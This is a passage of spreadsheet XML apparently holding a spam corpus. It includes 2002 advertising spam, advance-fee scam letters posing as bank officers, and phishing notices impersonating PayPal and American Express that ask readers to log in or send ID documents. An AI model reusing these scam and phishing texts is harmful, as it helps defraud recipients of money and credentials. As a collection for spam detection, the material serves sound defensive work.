    <t>To: "wX8ddy2." &lt;vpJNPKU654aFz869@cdc55i.com&gt;\nFrom: dec0IQtF &lt;sPVF2.zzdEHsQ_VS@emarketinggurus.com&gt;\nDate: Thu, 30 May 2002 22:17:28 +0100</t>
  </si>
  <si>
    <t>Thu, 30 May 2002 22:17:28 +0100</t>
  </si>
  <si>
    <t>dec0IQtF &lt;sPVF2.zzdEHsQ_VS@emarketinggurus.com&gt;</t>
  </si>
  <si>
    <t>"wX8ddy2." &lt;vpJNPKU654aFz869@cdc55i.com&gt;</t>
  </si>
  <si>
    <t>FREE ADULT DVD!!! 9We-hbi</t>
  </si>
  <si>
    <t>BUY 2 ADULT DVDs AT REGULAR PRICE AND GET A THIRD XXX DVD FOR FREE!!\n\nVISIT US AT [URL]http://www.hotdvds.org[/URL]\n\nTo be removed from our list, just reply to this email and type REMOVE in the subject line 6js7M_5WNea5xu3M_D7K7Oouz</t>
  </si>
  <si>
    <t>http://www.hotdvds.org</t>
  </si>
  <si>
    <t>5022</t>
  </si>
  <si>
    <t>To: dawn@netnut.net\nFrom: Melvina Grossmann &lt;hotkoarohlopme@hotmail.com&gt;\nDate: Thu, 30 May 2002 22:16:09 +0000</t>
  </si>
  <si>
    <t>Thu, 30 May 2002 22:16:09 +0000</t>
  </si>
  <si>
    <t>Melvina Grossmann &lt;hotkoarohlopme@hotmail.com&gt;</t>
  </si>
  <si>
    <t>dawn@netnut.net</t>
  </si>
  <si>
    <t>* You CAN have the best MORTGAGE rate *           10469</t>
  </si>
  <si>
    <t>|\n\n**Dear HOMEOWNER,**  \n  \n---  \n|\n\n**Interest rates are at their lowest point in 40 years!**  \n  \n---  \n|\n\n**Let us do the shopping for you... AND IT'S FREE!**\n\n![]([URL]http://61.129.81.74[/URL]\n\n|  _  \nOur nationwide network of lenders have hundreds of different loan programs to\nfit your current situation:_ **\n\n  * Refinance\n  * Second Mortgage\n  * Debt Consolidation\n  * Home Improvement\n  * Purchase \n\n**\n\nPlease **CLICK HERE** to fill out a quick form. Your request will be\ntransmitted to our network of mortgage specialists.  \n  \n---|---  \n  \n  \n  \n---  \n  \n**This service is100% FREE to home owners and new home buyers without any\nobligation.**  \n  \n---  \n  \nDid you receive an email advertisement in error? Our goal is to only target\nindividuals who would like to take advantage of our offers. If you'd like to\nbe removed from our mailing list, please click on the link below. You will be\nremoved immediately and automatically from all of our future mailings.  \n  \n  \n---  \nWe protect all email addresses from other third parties. Thank you. | Please\nremove me.\n\n</t>
  </si>
  <si>
    <t>5024</t>
  </si>
  <si>
    <t>To: bazzbgulvm@xum2.xumx.com\nFrom: mort239o@xum2.xumx.com\nDate: Thu, 30 May 2002 22:06:00 -0400</t>
  </si>
  <si>
    <t>Thu, 30 May 2002 22:06:00 -0400</t>
  </si>
  <si>
    <t>mort239o@xum2.xumx.com</t>
  </si>
  <si>
    <t>bazzbgulvm@xum2.xumx.com</t>
  </si>
  <si>
    <t>ADV: FREE Mortgage Rate Quote - Save THOUSANDS! kplxl</t>
  </si>
  <si>
    <t>Save thousands by refinancing now. Apply from the privacy of your home and receive a FREE no-obligation loan quote.\n[URL]http://211.78.96.11[/URL]\n  \nRates are Down. YOU Win!\n  \nCriteria has relaxed. YOU Win!\n  \nSelf-Employed or Poor Credit is OK!\n  \nGet CASH out or money for Home Improvements, Debt Consolidation and more.\n  \nInterest rates are at the lowest point in years-right now! This is the perfect time for you to get a FREE quote and find out how much you can save!\n  \nIf those home improvements or high rate credit cards put a dent in your credit, refinance or consolidate your debt now! One easy payment. Customized for your financial situation. Great low rate loans are available for all credit types.\n  \nGet YOUR Free Quote. Fill out the one minute form at:\n[URL]http://211.78.96.11[/URL]\n  \n  \n  \n  \n*******************************************\nTo unsubscribe, click below:\n[URL]http://211.78.96.11[/URL]\nAllow 72 hours for removal.</t>
  </si>
  <si>
    <t>http://211.78.96.11 http://211.78.96.11 http://211.78.96.11</t>
  </si>
  <si>
    <t>5023</t>
  </si>
  <si>
    <t>To: nan\nFrom: "John" &lt;hok_stein3380@eudoramail.com&gt;\nDate: Thu, 30 May 2002 21:47:03 -0400</t>
  </si>
  <si>
    <t>Thu, 30 May 2002 21:47:03 -0400</t>
  </si>
  <si>
    <t>"John" &lt;hok_stein3380@eudoramail.com&gt;</t>
  </si>
  <si>
    <t>Spend less gas per mile on your car this Summer...</t>
  </si>
  <si>
    <t xml:space="preserve">  \n  \n**![]([URL]http://81.9.8.40[/URL]**\n\n\n\n **Increase Your Gas Mileage  \nby up to 27% !!**  \n---  \n*** No TOOLS required!  \n* Improves Power![]([URL]http://81.9.8.40[/URL]  \n* Maximizes Energy  \n* Improves Mileage   \n* Improves Torque   \n* Cleaner Engine   \n* Smoother Engine   \n* Reduces Emissions by 43%   \n* Protects Catalytic Converters   \n* Prevents Diesel Gelling   \n* Improves Spark Plug Life   \n* Maintenance Free  \n* Pays for Itself within 60 days!** | **_Installs in Seconds!_  \nA simple device that easily snaps over your fuel line.  Anyone can do it!  \n**\n\n**_Guaranteed_** ** _!_  \nFULL REFUND if you are not satisfied with the result within THREE MONTHS from\nthe date of purchase.**\n\n**CLICK HERE**  \n  \nHOW TO UNSUBSCRIBE:  \nYou received this e-mail because you are registered at one of our Web sites,\nor on one of our partners' sites.  \n If you do not want to receive partner e-mail offers, or any email marketing\nfrom us please click here.  \n  \n[^3247(^(PO1:KJ)_8J7BJ]\n\n</t>
  </si>
  <si>
    <t>http://81.9.8.40 http://81.9.8.40</t>
  </si>
  <si>
    <t>5031</t>
  </si>
  <si>
    <t>To: &lt;Undisclosed.Recipients@dogma.slashnull.org&gt;\nFrom: fdg4a84@yahoo.com\nDate: Thu, 30 May 2002 20:53:09 -1600</t>
  </si>
  <si>
    <t>Thu, 30 May 2002 20:53:09 -1600</t>
  </si>
  <si>
    <t>fdg4a84@yahoo.com</t>
  </si>
  <si>
    <t>&lt;Undisclosed.Recipients@dogma.slashnull.org&gt;</t>
  </si>
  <si>
    <t>This investment could save your life24607</t>
  </si>
  <si>
    <t>PEPPER SPRAY SELF DEFENSE SYSTEM...THIS SMALL INVESTMENT COULD\nSAVE YOUR LIFE!\n\nDear Member,\n\nSaydeal is offering a special price for all its members\non self defense pepper spray.  We have various sizes which are\nperfect for keychains, purses, or cars.  This offer extends to all\nof your family and friends.  The prices are far cheaper than retail\nstores and the delivery is free.  You can get a keychain sized spray\nfor $14.99 and shipping is free. If you have ever wanted to purchase\na self defense product for yourself or loved ones, please take the\ntime to review the site.\nwe hope we can make your summer just a little safer!\n\n[URL]http://www.saydeal.com[/URL]\n\n\n\nThis email complies with all current US regulations.  If you\nwish to be removed from this list please reply to this email with\n"REMOVE" in the subject.</t>
  </si>
  <si>
    <t>http://www.saydeal.com</t>
  </si>
  <si>
    <t>5019</t>
  </si>
  <si>
    <t>To: "yyyy@spamassassin.taint.org" &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "Tesco.ie " &lt;tesco.ie@emv2.com&gt;\nDate: Thu, 30 May 2002 20:21:25 +0200 (CEST)</t>
  </si>
  <si>
    <t>Thu, 30 May 2002 20:21:25 +0200 (CEST)</t>
  </si>
  <si>
    <t>"Tesco.ie " &lt;tesco.ie@emv2.com&gt;</t>
  </si>
  <si>
    <t>"yyyy@spamassassin.taint.org" &lt;yyyy@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Ireland's first great World Cup result</t>
  </si>
  <si>
    <t>--1715101671.1022782885778.JavaMail.root.smtp4 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 7bit O'Connor quickly moved his cursor down the left side of the web page. Then, showing a flash of his silky skills, he cut across to the right hand side and clicked on Top Ten Special Offers. He zipped past the Irish Chicken Breast Fillets at 25% off, nipped round the HB Selections ice cream also at 25% off and went on with the goal firmly in sight:   - Budweiser '24 pack 500ml cans'. Was E49.20. Now E42.15. SAVE E7.05*   - Guinness '24 pack 500ml cans'. Was E50.16. Now E42.33. SAVE E7.83* With one of his trademark clicks of the mouse he sent his cost-price cases of beer straight into the back of his online basket.  1 - 0 to Ireland. From there O'Connor was unstoppable and went on to make it an unforgettable afternoon as he tucked away another four goals:   - Pringles Large Tubes 200g. Was E2.05 each. Now buy 2 for E3.00*   - Hula Hoops Minis Tub 140g. Was E2.42. Now buy one get 2nd half price*   - Club Twin Packs 2x2 litre. Was E3.10 each.     Now buy 1 get 2nd half price*   - Twix 9 pack. Was E1.99. Now buy 1 get 2nd half price* To take advantage of these fantastic World Cup offers, click here: [URL]http://195.200.172.1[/URL]  * Offer ends June 9th. You can't miss it. Why not get everyone behind our boys and send this email on to a friend so they can enjoy these great offers too? Because we're selling cases at cost-price we can only offer a maximum of 6 cases of Guinness and 6 cases of Budweiser per household. -------------------------------------------------------------------- All products are subject to availability while stocks last. Online prices may vary from those charged in-store. Prices in this email are correct at the time of production and are subject to change. Please see website for latest prices. If you would prefer not to receive emails with news and special offers from Tesco.ie, please click here: [URL]http://www.tesco.ie[/URL] This may take up to five working days to unsubscribe. --1715101671.1022782885778.JavaMail.root.smtp4 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: 7bit Ireland's first great World Cup result O’Connor                  quickly moved his cursor down the left side of the web page. Then,                  showing a flash of his silky skills, he cut across to the right                  hand side and clicked on Top Ten Special Offers.                   He zipped past the Irish Chicken Breast Fillets at 25% off, nipped                  round the HB Selections ice cream also at 25% off and went on                  with the goal firmly in sight. With                  one of his trademark clicks of the mouse he sent his cost-price                  cases of beer straight into the back of his online basket. 1 –                  0 to Ireland. From there O’Connor was unstoppable and went                  on to make it an unforgettable afternoon as he tucked away another                  four goals.  Budweiser                      24pack 500ml Save €7.05*Was                      €49.20 Buy Now €42.15  Guinness                      24pack 500ml Save €7.83*Was                      €50.16 Buy Now €42.33 Pringles                Large Tubes 200g. Was €2.05 each. Now                buy 2 for €3.00* Twix                9 pack. Was €1.99. Now                buy 1 get 2nd half price* Hula                Hoops Minis Tub140g. Was €2.42. Now                buy one get 2nd half price* Club                Twin Packs 2x2 litre. Was €3.10 each. Now                buy 1 get 2nd half price* To take                advantage of these fantastic World Cup offers click here [URL]http://www.tesco.ie[/URL]                 Why                  not get everyone behind our boys and send this email on to a friend                  so they can enjoy these great offers too? Because                  we’re selling cases at cost-price we can only offer a maximum                  of 6 cases of Guinness and 6 cases of Budweiser per household. Remember          you earn Clubcard points on every purchase All products            are subject to availability while stocks last. Online            prices may vary from those charged in-store. Prices            in this email are correct at the time of production and are subject            to change. Please see website for latest prices. If you            would prefer not to receive emails with news and special offers from            Tesco.ie, please click here: [URL]http://www.tesco.ie[/URL] This may            take up to five working days to unsubscribe. --1715101671.1022782885778.JavaMail.root.smtp4--</t>
  </si>
  <si>
    <t>http://195.200.172.1 http://www.tesco.ie http://www.tesco.ie http://www.tesco.ie</t>
  </si>
  <si>
    <t>5015</t>
  </si>
  <si>
    <t>To: "mjqujoxpe@alltel.net" &lt;mjqujoxpe@alltel.net&gt;\nFrom: "Julie" &lt;fvgdouiqvg@vol.com.ar&gt;\nDate: Thu, 30 May 2002 16:51:41 +0900</t>
  </si>
  <si>
    <t>Thu, 30 May 2002 16:51:41 +0900</t>
  </si>
  <si>
    <t>"Julie" &lt;fvgdouiqvg@vol.com.ar&gt;</t>
  </si>
  <si>
    <t>"mjqujoxpe@alltel.net" &lt;mjqujoxpe@alltel.net&gt;</t>
  </si>
  <si>
    <t>A youthful and slim summer in 2002</t>
  </si>
  <si>
    <t>As seen on NBC, CBS, CNN, and even Oprah! The health \ndiscovery that actually reverses aging while burning fat, \nwithout dieting or exercise! This proven discovery has even \nbeen reported on by the New England Journal of Medicine. \nForget  aging and dieting forever! And it's Guaranteed!   \n\nClick here:\n[URL]http://66.231.133.205[/URL] \n\nWould you like to lose weight while you sleep!\nNo dieting!\nNo hunger pains!\nNo Cravings!\nNo strenuous exercise!\nChange your life forever! \n\n100% GUARANTEED!\n\n1.Body Fat Loss            82% improvement.\n2.Wrinkle Reduction     61% improvement.\n3.Energy Level              84% improvement.\n4.Muscle Strength         88% improvement.\n5.Sexual Potency         75% improvement.\n6.Emotional Stability      67% improvement.\n7.Memory                      62% improvement.\n\n***********************************************************\n\nYou are receiving this email as a subscriber\nto the Opt-In America Mailing List. \nTo unsubscribe from future offers,\njust click here:\nmailto:affiliateoptout@btamail.net.cn?Subject=off</t>
  </si>
  <si>
    <t>http://66.231.133.205</t>
  </si>
  <si>
    <t>5021</t>
  </si>
  <si>
    <t>To: webtv@netnook.com\nFrom: "Bradford Jackson"&lt;mail0206@btamail.net.cn&gt;\nDate: Thu, 30 May 2002 14:47:51 -0700</t>
  </si>
  <si>
    <t>Thu, 30 May 2002 14:47:51 -0700</t>
  </si>
  <si>
    <t>"Bradford Jackson"&lt;mail0206@btamail.net.cn&gt;</t>
  </si>
  <si>
    <t>webtv@netnook.com</t>
  </si>
  <si>
    <t>FREE Travel package and Business Kit...</t>
  </si>
  <si>
    <t>Hotels Etc. is giving away 10,000 of our $495 Travel Packages FREE, to help the USA in the promotion of the travel business. The first 10,000 customers who sign up will receive over $5000 worth of other free products.\n \nThis includes:\n               \n                FREE 50% off card/vouchers for all hotels in usa \n \n                FREE $2,000 Las Vegas, Hawaii &amp; Orlando gift check \n \n                FREE vacation certificates for Las Vegas, Hawaii and Orlando \n    \nAs an added bonus you will receive the following:\n     \n   Free Kodak film for life coupon \n \n   FREE Vacation Certificate...\n   Lodging for three exciting days and two fun-filled nights at your choice of one of 20 fabulous destinations including Las Vegas and Lake Tahoe, Nevada; Daytona    Beach, Florida; Cancun and  Puerto Vallarta, Mexico; Gatlinburg, Tennessee;Branson, Missouri;Honolulu, Hawaii; and many  more! ($175 Value) \n \nThis also comes with a free home business where you work as much as you like, whenever you like, to make your own money with your own business.\n \nVisit us at our website to see more info on all of these amazing oportunities.\nDo not miss out.\n \nVisit [URL]http://freetravel@66.46.145.35[/URL]</t>
  </si>
  <si>
    <t>http://freetravel@66.46.145.35</t>
  </si>
  <si>
    <t>5016</t>
  </si>
  <si>
    <t>To: walter.smith@firstworld.net\nFrom: lando0mau@netscape.net\nDate: Thu, 30 May 2002 05:14:11 -0400</t>
  </si>
  <si>
    <t>Thu, 30 May 2002 05:14:11 -0400</t>
  </si>
  <si>
    <t>lando0mau@netscape.net</t>
  </si>
  <si>
    <t>walter.smith@firstworld.net</t>
  </si>
  <si>
    <t>You can gain from lowest interest rates in 30 years</t>
  </si>
  <si>
    <t>Certain chances only come around every few decades or so. This is one. Why you ask? Because home loan rates are headed up. Have you locked in the lowest rate, in almost thirty years, for your present home loan? Rates haven't been this low in a long time. They may well never be this low again. This is your chance to secure a better future. You could literally save enough money to buy that new car you've been wanting or to take that special vacation. Why wouldn't you jump at this chance? There's no need for you to continue to pay more than is necessary or to continue not having the things your family wants and needs.    We're a nationwide mortgage lender. We're N0T a broker. And we can guarantee you the best rate and the best deal possible for you. But only if you take action today.   There is no fee or charge of any kind to see if we can help you get more of the things you want, desire and need from your current pay. You can easily determine if we can help you in just a few short minutes. We only provide information in terms so simple that anyone can understand them. You won't need to be a lawyer to see the savings, this we promise.   We offer both first and second home loans and we will be happy to show you why your current loan is the best for you. 0r why you should replace it. And once again, there's no risk for you. None at all.  Take a couple of minutes and use the link below that works for you. For a couple of minutes of your time, we can show you how to get more for yourself and your loved ones. Don't lose this chance. Please take action now. Click_Here [URL]http://ad.goo.ne.jp[/URL]   Sincerely, James W. Minick MortBanc, Inc. __________________________________________________________________ Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! [URL]http://shopnow.netscape.com[/URL] Get your own FREE, personal Netscape Mail account today at [URL]http://webmail.netscape.com[/URL]</t>
  </si>
  <si>
    <t>http://ad.goo.ne.jp http://shopnow.netscape.com http://webmail.netscape.com</t>
  </si>
  <si>
    <t>1382</t>
  </si>
  <si>
    <t>To: nan\nFrom: garyadams1 &lt;garyadams2005@yahoo.com&gt;\nDate: Thu, 30 Jun 2005 19:57:50 +0200</t>
  </si>
  <si>
    <t>Thu, 30 Jun 2005 19:57:50 +0200</t>
  </si>
  <si>
    <t>garyadams1 &lt;garyadams2005@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Need to hear from you please -From Gary Adams</t>
  </si>
  <si>
    <t>\nBarclays Bank Plc \n\n65/66 St. Mary Axe \n\nLondon EC3A 8LE\n\n\n\nI am Mr. Gary Adams, Senior Credit Officer, Barclays Bank Plc London. I am writing following an opportunity in my office that will be of immense benefit to both of us.\n\n\n\nIn my department we discovered an abandoned sum of 12.5million British Pounds Sterling (Twelve Million Five Hundred Thousand British Pounds Sterling) in an account that belongs to one of our foreign customers Late Mr. Morris Thompson an American who unfortunately lost his life in the plane crash of Alaska Airlines Flight 261, which crashed on January 31 2000, including his wife and only daughter. You shall read more about the crash on visiting this website.\n\n\n\n[URL]http://www.cnn.com[/URL]\n\n\n\n[URL]http://www.nativefederation.org[/URL]\n\n\n\nSince we got information about his death, we have been expecting his next of kin or relatives to come over and claim his money because the Bank cannot release the funds unless somebody applies for it as next of kin or relation to the deceased as indicated in our banking guidelines.\n\n\n\nUnfortunately I learnt that his supposed next of kin being his only daughter died along with him in the plane crash leaving nobody with the knowledge of this fund behind for the claim. It is therefore upon this discovery that I and two other officials in this department now decided to do business with you and release the money to you as the next of kin or beneficiary of the funds for safe keeping and subsequent disbursement since nobody is coming for it and we don't want this money to go back into Government treasury as unclaimed bill.\n\n\n\nWe agreed that 20% of this money would be for you as foreign partner, while the balance will be for my colleagues and I. We will visit your country for the disbursement according to the percentages indicated above once this money gets into your account. Please be honest to me as trust is our watchword in this transaction.\n\n\n\nNote that this transaction is confidential and risk free. As soon as you receive this mail you should contact me by return mail whether or not you are willing to enter into this deal. In the event you are not interested, I sincerely ask that you disregard this email and tell no one about it. I am very careful on truncating my banking career should you mention this to someone else. I hope you can be trusted in this regard. \n\n\n\nPlease note that all necessary arrangement for the smooth release of these funds to you has been finalized. We will discuss much in details when I do receive your response.\n\nPlease in your response include your telephone and fax numbers for a better communication between us.\n\n\n\nYou can reach me on the email below\n\n\n\nBest regards\n\n\n\nGary Adams\n\n\n\nEmail: garyadams20056@netscape.net\n\n\n\nFax: +00 - 44 - 7092044703\n\n\n\n___________________________________________________________________________\nMail sent from WebMail service at PHP-Nuke Powered Site\n\n- [URL]http://yoursite.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.cnn.com http://www.nativefederation.org http://yoursite.com</t>
  </si>
  <si>
    <t>1381</t>
  </si>
  <si>
    <t>To: nan\nFrom: garyadams1 &lt;garyadams2005@yahoo.com&gt;\nDate: Thu, 30 Jun 2005 19:14:38 +0200</t>
  </si>
  <si>
    <t>Thu, 30 Jun 2005 19:14:38 +0200</t>
  </si>
  <si>
    <t>\nBarclays Bank Plc \n\n65/66 St. Mary Axe \n\nLondon EC3A 8LE\n\n\n\nI am Mr. Gary Adams, Senior Credit Officer, Barclays Bank Plc London. I am writing following an opportunity in my office that will be of immense benefit to both of us.\n\n\n\nIn my department we discovered an abandoned sum of 12.5million British Pounds Sterling (Twelve Million Five Hundred Thousand British Pounds Sterling) in an account that belongs to one of our foreign customers Late Mr. Morris Thompson an American who unfortunately lost his life in the plane crash of Alaska Airlines Flight 261, which crashed on January 31 2000, including his wife and only daughter. You shall read more about the crash on visiting this website.\n\n\n\n[URL]http://www.cnn.com[/URL]\n\n\n\n[URL]http://www.nativefederation.org[/URL]\n\n\n\nSince we got information about his death, we have been expecting his next of kin or relatives to come over and claim his money because the Bank cannot release the funds unless somebody applies for it as next of kin or relation to the deceased as indicated in our banking guidelines.\n\n\n\nUnfortunately I learnt that his supposed next of kin being his only daughter died along with him in the plane crash leaving nobody with the knowledge of this fund behind for the claim. It is therefore upon this discovery that I and two other officials in this department now decided to do business with you and release the money to you as the next of kin or beneficiary of the funds for safe keeping and subsequent disbursement since nobody is coming for it and we don't want this money to go back into Government treasury as unclaimed bill.\n\n\n\nWe agreed that 20% of this money would be for you as foreign partner, while the balance will be for my colleagues and I. We will visit your country for the disbursement according to the percentages indicated above once this money gets into your account. Please be honest to me as trust is our watchword in this transaction.\n\n\n\nNote that this transaction is confidential and risk free. As soon as you receive this mail you should contact me by return mail whether or not you are willing to enter into this deal. In the event you are not interested, I sincerely ask that you disregard this email and tell no one about it. I am very careful on truncating my banking career should you mention this to someone else. I hope you can be trusted in this regard. \n\n\n\nPlease note that all necessary arrangement for the smooth release of these funds to you has been finalized. We will discuss much in details when I do receive your response.\n\nPlease in your response include your telephone and fax numbers for a better communication between us.\n\n\n\nYou can reach me on the email below\n\n\n\nBest regards\n\n\n\nGary Adams\n\nEmail: garyadams20057@netscape.net\n\nFax: +00 - 44 - 7092044703\n\n\n\n___________________________________________________________________________\nMail sent from WebMail service at PHP-Nuke Powered Site\n\n- [URL]http://yoursite.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "service@paypal" &lt;support.sce@pp.accounts.com&gt;\nDate: Thu, 3 Nov 2016 13:59:01 +0100</t>
  </si>
  <si>
    <t>Thu, 3 Nov 2016 13:59:01 +0100</t>
  </si>
  <si>
    <t>"service@paypal" &lt;support.sce@pp.accounts.com&gt;</t>
  </si>
  <si>
    <t>We're making a few changes</t>
  </si>
  <si>
    <t>jose – we’re making a few changes View Online       We're making a few changes...     We’re making some changes to our Legal Agreements; the documents that govern our relationship with you. We’ve put details of the changes on our Policy Update web page – you can also find the page at [URL]www.paypal.com[/URL], by clicking ‘Legal’ at the bottom of the page, selecting your country from the drop-down menu and then selecting ‘Policy Updates’.   What do I have to do?   To accept the changes, please login to your account and update your information, just 3 easy steps: 1- Click the link below. 2- Login to your account. 3- Follow the instructions.   Update your information     Help   Contact   Security         This email was sent to jose@monkey.org, because your email preferences are set to receive All Policy Change Notices. 																								Copyright © 1999-2016 PayPal. All rights reserved.</t>
  </si>
  <si>
    <t>912</t>
  </si>
  <si>
    <t>To: Recipients &lt;john309@kwikom.com&gt;\nFrom: "AmericanExpress Customer Center" &lt;john309@kwikom.com&gt;\nDate: Thu, 29 Nov 2018 19:57:49 +0000</t>
  </si>
  <si>
    <t>Thu, 29 Nov 2018 19:57:49 +0000</t>
  </si>
  <si>
    <t>"AmericanExpress Customer Center" &lt;john309@kwikom.com&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;john309@kwikom.com&gt;</t>
  </si>
  <si>
    <t>Profile and Preference Update</t>
  </si>
  <si>
    <t>Account Alert:	    	 Important Service Notification	    	 	  Your Account Number Begining: -37XX      	 	    	 	  Dear Customer,  Due to recent activity on your account,we have issued the following security requirement.  For your security we have temporarily prevented access to your account due to a recent unusual charge on your account. We have attempted to contact you via phone at the number provided on your account and have not been unable to reach you and/or left a message.If you have already responded to our phone call,please disregard this message.  For your protection,Transactions on your account may be limited until you are able to verify the activity.We realize that this precaution may cause you some inconvenience; however keeping your account safe is one of our top priorities.log on to our website to rectify this on.  [URL]https://www.americanexpress.com[/URL]   Thank you for being a Valid Cardmember. We look forward to serving you best.  Sincerely, American Express Card Services      	 	 	 	 	    	 	 Privacy Statement	  	 Add Us to Your Address Book	    	 	   This customer service email was sent to your email adrress on file with American Express. You may receive customer service emails even if you have requested not to receive marketing emails from American Express. Copyright 2018 American Express Company. All rights reserved.   GENEVAZR0001703   Account Alert: Important Service Notification Your Account Number Begining: -37XX Dear Customer, Due to recent activity on your account,we have issued the following security requirement. For your security we have temporarily prevented access to your account due to a recent unusual charge on your account. We have attempted to contact you via phone at the number provided on your account and have not been unable to reach you and/or left a message.If you have already responded to our phone call,please disregard this message. For your protection,Transactions on your account may be limited until you are able to verify the activity.We realize that this precaution may cause you some inconvenience; however keeping your account safe is one of our top priorities.log on to our website to rectify this on. [URL]https://www.americanexpress.com[/URL] Thank you for being a Valid Cardmember. We look forward to serving you best. Sincerely,American Express Card Services Privacy Statement   Add Us to Your Address Book This customer service email was sent to your email adrress on file with American Express. You may receive customer service emails even if you have requested not to receive marketing emails from American Express.Copyright 2018 American Express Company. All rights reserved. GENEVAZR0001703</t>
  </si>
  <si>
    <t>https://www.americanexpress.com https://www.americanexpress.com</t>
  </si>
  <si>
    <t>2997</t>
  </si>
  <si>
    <t>To: mikeadimorah8@tutopia.com\nFrom: mikeadimorah8@tutopia.com\nDate: Thu, 29 Mar 2007 16:19:54 -0400</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2007 16:19:54 -0400</t>
  </si>
  <si>
    <t>mikeadimorah8@tutopia.com</t>
  </si>
  <si>
    <t>COMPENSATION FOR YOUR PAST EFFORT</t>
  </si>
  <si>
    <t>Dear Friend,</t>
  </si>
  <si>
    <t>http://www.tutopia.com</t>
  </si>
  <si>
    <t>COL</t>
  </si>
  <si>
    <t>2996</t>
  </si>
  <si>
    <t>To: sulemanzz@latinmail.com &lt;sulemanzz@latinmail.com&gt;\nFrom: Dr. Suleman M &lt;sulemanzz@latinmail.com&gt;\nDate: Thu, 29 Mar 2007 00:58:03 +0200</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2007 00:58:03 +0200</t>
  </si>
  <si>
    <t>Dr. Suleman M &lt;sulemanzz@latinmail.com&gt;</t>
  </si>
  <si>
    <t>sulemanzz@latinmail.com &lt;sulemanzz@latinmail.com&gt;</t>
  </si>
  <si>
    <t>URGENT PLEASE</t>
  </si>
  <si>
    <t>DEAR,\n\nGREETING TO YOU,\nI AM DR SULEMAN MUHAMEDE FROM THE NORTHERN PART OF BURKINA FASO.I WANT TO SEEK YOUR ASSISTANCE AFTER MY DISCOVERY DURING AUDITING IN MY BANK AS AM THE MANAGER OF BILL AND EXCHANGE AT THE FORIEGN REMITTANCE\nDEPARTMENT OF BANK OF AFRICA,(B.O.A.) IN MY DEPARTMENT WE DISCOVERED AN ABANDONED SUM OF USD$10.8MILLION US DOLLARS IN AN ACCOUNT THAT BELONGS TO ONE OF OUR FOREIGN CUSTOMERS WHO DIED ALONG WITH HIS ENTIRE FAMILY IN PLANE CRASHES 2003,\n\nSINCE HIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT OF KIN TO COME OVER AND \nCLAIM HIS MONEY BECAUSE WE CAN NOT RELEASE IT UNLESS SOMEBODY APPLIES FOR IT AS NEXT OF KIN OR RELATION TO THE DECEASED AS INDICATED IN OUR BANKING AND FINANCIAL POLICIES BUT UNFORTUNATELY ALL THE EFFORTS PROVED ABORTIVE.\n\nIT IS THEREFORE UPON THIS DISCOVERY THAT I DECIDED AS THE HEAD OF MY \nDEPARTMENT TO MAKE THIS BUSINESS PROPOSAL TO YOU AND RELEASE THE MONEY TO YOU AS THE NEXT OF KIN OR RELATION TO THE DECEASED FOR SAFETY AND SUBSEQUENT DISBURSEMENT SINCE NOBODY IS COMING FOR IT AND WE DON'T WANT THIS MONEY TO GO INTO THE BANK TREASURY AS UNCLAIMED BILLS.\n\nDO NOT VIEW THIS AS BEEN ILLEGAL BUT AN OPPORTUNITY FOR US TO HELP ENRICH \nOUR HOPE IN LIFE INSTEAD OF THE BANK CONVERTING THIS MUCH MONEY TO THE \nSECURITY FUNDS.YOU SHOULD NOT NURSE ANY ATOM OF FEAR AS ALL REQUIRED \nARRANGEMENTS HAVE BEEN MADE FOR THE SMOOTH TRANSFER OF THIS FUNDS AND YOUR ACCEPTANCE IS WHAT WILL CROWN THIS EFFORT.\n\nWE WILL CONCLUDE THIS OPERATION WITHIN 14 BANKING DAYS BASED ON THE AMOUNT OF COPERATION YOU WILL CONTRIBUTE.THANK YOU FOR YOUR UNDERSTANDING AS AWAIT YOUR URGENT RESPONSE TO ENABLE ME GIVE YOU MORE DETAILS.PLEASE REPLY WITH THOSE INFORMATIONS BELOW SO AS TO KNOW YOU WELL BEFORE I CAN GO AHEAD WITH YOU.PLEASE REPLY VIA (sulemazs@yahoo.com)\n\nYOUR ID CARD OR INTERNATIONAL PASSPORT.\nYOUR AGE.\nYOUR PROFESSION.\nYOUR COUNTRY.\nYOUR PARIVATE TELEPHONE NUMBER.\n\nREMAIN BLESSED,\nDR SULEMAN MUHAMEDE.\n\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>2278</t>
  </si>
  <si>
    <t>To: nan\nFrom: Qin &lt;mrqinwang1954_hongkong@o2.pl&gt;\nDate: Thu, 29 Jun 2006 10:13:12 -0400</t>
  </si>
  <si>
    <t>Thu, 29 Jun 2006 10:13:12 -0400</t>
  </si>
  <si>
    <t>Qin &lt;mrqinwang1954_hongkong@o2.pl&gt;</t>
  </si>
  <si>
    <t>Business project</t>
  </si>
  <si>
    <t>Business project\n\n&gt;From Mr.Qin Wang\nLloyds TSB Pacific Limited\nHong Kong Branch\nTwo Exchange Square\nCentral, Hong Kong\nTEL:852-300-61424\nFax: +852-301-66259\nFax:852-301-77134\n[URL]http://www.lloydstsb.com.hk[/URL]\n\nThank you for giving me your time,it is of great importance for you to\ntake care and understand every word which I have written down below;\nplease be patient and read my email.\n\nI am a staff of Lloyds TSB Group Plc here in Hong Kong attached in Private\nBanking Services. I am contacting you concerning a customer and an\ninvestment placed under our banks management; as a matter of fact it was 3\nyears ago. I would respectfully request that you keep the contents of this\nmail private and also to kindly respect the integrity of the information\nyou come by as a result of this email.I contacted you independently of our\ninvestigation and no one is informed of this communication; I would like\nto intimate you with certain facts that I believe would be of interest to\nyou.\n\nIn 2000, the subject matter; Ref: FI/TSB/957/048/0532 came to our bank to\nengage in business discussions with our Private Banking Services\nDepartment. He informed us that he had a financial portfolio of 11.37\nmillion United States Dollars, which he wished to have us turn over\n(invest) on his behalf. I was the officer assigned to his case; I made\nnumerous suggestions in line with my duties as the de-facto chief\noperations officer of the Private Banking Services Department, especially\ngiven the volume of funds he wished to put into our bank. We met on\nnumerous 